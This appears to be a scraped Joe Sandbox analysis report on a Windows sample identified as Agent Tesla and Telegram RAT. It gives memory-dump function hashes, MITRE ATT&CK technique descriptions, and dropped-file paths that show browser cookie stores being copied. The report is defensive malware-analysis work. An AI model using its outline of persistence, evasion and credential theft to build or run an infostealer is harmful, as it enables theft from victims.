Opcode Fuzzy Hash: 4f9c01f481569e1172d9c945ea34abb72aa8f00a2120915fdaa671fb558339b3
Instruction Fuzzy Hash: 1301D271F001149FC714EBB9E8147AE7BB6EF89710F1080BAD609DB3A5CA359C01CB91

Function 017C1421 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1629485461.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b134f28ba8c5f66960782e0e16d17e06d67b460c8e380eb9c42e4a2b7d4362f2
Instruction ID: c34ef9551921f69ecb4a8ce02655403116242e229d055c32fdddd4e715d501dd
Opcode Fuzzy Hash: b134f28ba8c5f66960782e0e16d17e06d67b460c8e380eb9c42e4a2b7d4362f2
Instruction Fuzzy Hash: 04F0F071B013154FD78857745C106BF77E9EFC5220704057EE40ACB350DE754C0287A0

Function 017C0857 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1629485461.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37c698a44b4b1bcfc8a0e4baa9c99b09fbc6947b298fb2caa5b469ef1aedc1b6
Instruction ID: 847c08da864bc98fbd636bda9bb51ab2e40fca122547811e37d9579adbce4f8a
Opcode Fuzzy Hash: 37c698a44b4b1bcfc8a0e4baa9c99b09fbc6947b298fb2caa5b469ef1aedc1b6
Instruction Fuzzy Hash: 64F06531A187499FC715CFBD94545EFBFF9DF4566470480AFE049D3212E63099418B50

Function 017C0868 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1629485461.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 327f547fd80546c7c4d1f201992e64c47f146ba80e86d95dff23d6658438414e
Instruction ID: 3ca8532947a30c6e8e84b2a583437954fd5a623e85103d9cc9ac811bf5104c56
Opcode Fuzzy Hash: 327f547fd80546c7c4d1f201992e64c47f146ba80e86d95dff23d6658438414e
Instruction Fuzzy Hash: 3CE09232B08209AF9B14EFFDE4484DEBFEDEB48272B04806AF00DD2215EA7094408B90

Function 017C153A Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1629485461.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08c8bc25185c4c98e0a53b45cd329b2583b5f0c967981ccd80efd6ba4a936849
Instruction ID: 1329241e6392f604af0be6bd762d8106b2d7266bc50a962a0b9439de7597713a
Opcode Fuzzy Hash: 08c8bc25185c4c98e0a53b45cd329b2583b5f0c967981ccd80efd6ba4a936849
Instruction Fuzzy Hash: 69E02230B04310CFC756EABCB4642A937E5AFCA611B0044BED801C7281DB784C028BD1

Function 017C13E0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1629485461.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 828ab93ebd33590fa83c1ea4e86d2a3ed158fc604ba83cd33f146e65f7ed13c8
Instruction ID: 785d23c2fc0d3d70ee5c294195d7c659877395b10e0d056ea3147ec536cd2505
Opcode Fuzzy Hash: 828ab93ebd33590fa83c1ea4e86d2a3ed158fc604ba83cd33f146e65f7ed13c8
Instruction Fuzzy Hash: 74E08C38A082808FC719DF28F528A94BFF4EB4A306B5100EAE8418B277C2A84C50CB51

Function 017C1489 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1629485461.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f8d4eff1af671b190fba58e3b0a30826784f98f284d329057ea43a1a50fcffc
Instruction ID: 846a61866b2bb2872d363bdff22fa689c11762812bcd690032f78e8077865b81
Opcode Fuzzy Hash: 9f8d4eff1af671b190fba58e3b0a30826784f98f284d329057ea43a1a50fcffc
Instruction Fuzzy Hash: F2D0A732E057548BD7509BA5AC051CCBBA4DB02755B4440BED909CF162EA14CA1483D6

Function 017C1590 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1629485461.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 997409d6ca0ec7e44a22606a8a5a318904765fe222d754a259727924e9528601
Instruction ID: 52c64801ce7380697d1f412dc579eb28fdf5b2699fdc77a4bf44dd6ad2f5e6dc
Opcode Fuzzy Hash: 997409d6ca0ec7e44a22606a8a5a318904765fe222d754a259727924e9528601
Instruction Fuzzy Hash: C8C012301857928FC7539AB4486018137E0AD0222834500EAC080DF063F15C0C45C762

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 08(2)_00.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\08(2)_00.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fOLFRQq.exe.log

C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe

C:\Users\user\AppData\Roaming\lqadtknr.kra\Chrome\Default\Network\Cookies

C:\Users\user\AppData\Roaming\lqadtknr.kra\Edge Chromium\Default\Network\Cookies

C:\Users\user\AppData\Roaming\lqadtknr.kra\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
08(2)_00.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre